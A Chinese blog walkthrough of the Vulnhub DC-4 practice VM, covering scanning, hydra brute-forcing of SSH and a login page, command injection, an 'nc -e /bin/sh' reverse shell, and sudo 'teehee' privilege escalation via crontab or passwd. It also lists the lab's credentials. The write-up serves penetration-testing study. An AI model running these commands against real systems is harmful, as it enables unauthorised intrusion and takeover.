Vulnhub DC-4 teehee 提权

最新推荐文章于 2024-08-14 23:23:27 发布
最新推荐文章于 2024-08-14 23:23:27 发布
阅读量1.6k 收藏 3
点赞数 4
分类专栏: 靶机 文章标签: teehee 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang_624/article/details/96740625
版权

Vulnhub 之 DC-4

本文只用于学习知识,不要将其用于非法途径,

前言

DC已经做了一半了,前三次都是基于初学者的,这次的难度就提升了,适合初学者和入门的伙伴。

还是按照常例看看作者是怎么描述的吧。

下载地址

DC-4

描述

DC-4是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。
​
与以前的DC版本不同,这个版本主要是为初学者/中间用户设计的。只有一面旗帜,但技术上来说,有多个入口,就像上次一样,没有线索。
​
必须具备Linux技能和熟悉Linux命令行,就像一些基本渗透测试工具的经验一样。
​
对于初学者来说,谷歌可能会有很大的帮助,但是你可以随时在@DCAU7发推给我寻求帮助,让你重新开始。但是请注意:我不会给你答案,相反,我会给你一个如何前进的想法。</pre>

所以说,谷歌真的很万能。O(∩*∩)O哈哈~*

靶机环境

记得修改DC-4的网络为NAT模式

kali : 192.168.248.130
​DC-4 : 192.168.248.128

靶机复现

  • 扫描网段

    nmap -sn 192.168.248.0/24

    发现目标ip : 192.168.248.128

  • 扫描端口

    nmap -sS 192.168.248.128

  • 尝试爆破ssh

    hydra -l root -P /root/Desktop/weakpass.txt -t 5 ssh://192.168.248.128

    一般破解需要时间所以我就做一个演示

  • 网站搜寻线索

    发现是一个登录框,

    并且没有登录限制,尝试爆破

    可以使用hydra爆破,这里我使用burp做测试

    设置为Cluster bomb,用户给admin和root ,密码采用弱口令字典这个网上挺多的,或者使用hydra的默认字典也可以,然后线程跑高点 , 我这里给burp设置的20,大概不到一分钟就出来了。

这里只要登录成功后之后的登录都是636了

  • 登录发现

    有三个命令可以运行,然后抓包查看发现可以在radio这块执行了系统命令,那么是否可以执行其他的命令

    尝试执行whoami

    既然可以执行一些简单的命令,我们就可以尝试去反弹shell

    命令:nc -e /bin/sh 192.168.248.130 4444

    获取交互模式

    命令:python -c 'import pty;pty.spawn("/bin/bash")'

    之后在home的jim目录下发现了一个旧密码的备份

    或许可以尝试用它去爆破ssh

    命令:chydra -L /root/Desktop/user.txt -P /root/Desktop/dc_pass.txt -t 5 ssh://192.168.248.128

    等待是漫长的,要有耐心

    终于出来了一个 用户名:jim 密码:jibril04

    切换到jim用户下,打开mbox查看

    有邮件,去mail下查看,发现了jim文件获取到jim的密码

  • 登录charles

    密码: ^xHhA&hvim0y

    命令:sudo -l查看权限 发现可以不需要密码执行teehee

    百度得到提权方式

    1 通过teehee的sudo提升权限以 root身份写入crontab计划任务通过执行获取root权限

    2 还有个2呢,多个想法多个活路

    通过添加用户到passwd,设置其权限,之后su 访问即可获得root

    所以,最好不要给用户sudo权限,或者限制sudo权限的,这样才能保证网络安全

结束语

今天的靶机奉上各位看官,过程简单,主要掌握提权的思路和前期爆破的等待。

参考文章:
https://www.anquanke.com/post/id/178658#h3-4

0zzie
关注
专栏目录
VulnHubDC-4
weixin_39219503的博客
01-31 284
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下,只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1956
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub DC-4
Pai_Space
02-17 599
描述: 只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 192.168.37.133 直接 submit 就可以登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f ...
VulnhubDC-4靶机详解
最新发布
weixin_62457642的博客
08-14 611
靶机DC-4速刷
vulnhub 入门DC-4
weixin_52780973的博客
01-01 223
vulnhub 实战靶机 linux teehee提权 hydra爆破登录框 ssh连接收到mail
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3160
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 366
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
Vulnhub DC-4靶场
weixin_47019868的博客
11-16 163
Vulnhub DC-4靶场
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 227
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 2980
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
Vulnhub-DC-4
KAKA的博客
07-04 297
扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24 扫描目标,获取系统信息和开放端口:80 && 22 nmap -A -p- 192.168.67.135 (初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路) 登陆 http://192.168.67.135 : 首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用 页面上写着:Admin Information
vulnhub-dc4
bqnagus
10-05 1179
vulnhub-dc4靶机复现
VulnHub DC: 4
spider的博客
12-01 241
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 440
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
[Vulnhub] DC-4
weixin_63231007的博客
01-28 903
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
[VulnHub]DC-4
cosmoslin的博客
09-07 144
VulnHub——DC-4渗透测试过程记录 测试人员:cosmos 目标地址:192.168.131.130 目标账号:未知 目标主机:未知 信息搜集 1.netdiscover netdiscover -r 192.168.131.0/24 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.130 3.nmap nmap -A 192.168.131.130 网站测试 进入网站 发现需要登录,提示admin登录,猜测用户名
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1161
vulnhubdc-4详细步骤
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 474
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现执行命令的地方 抓包发现命令由post包传过去 执行命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
/usr/bin/teehee
08-29
- *3* [DC-4靶机渗透(teehee提权)](https://blog.csdn.net/single_g_l/article/details/123687657)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值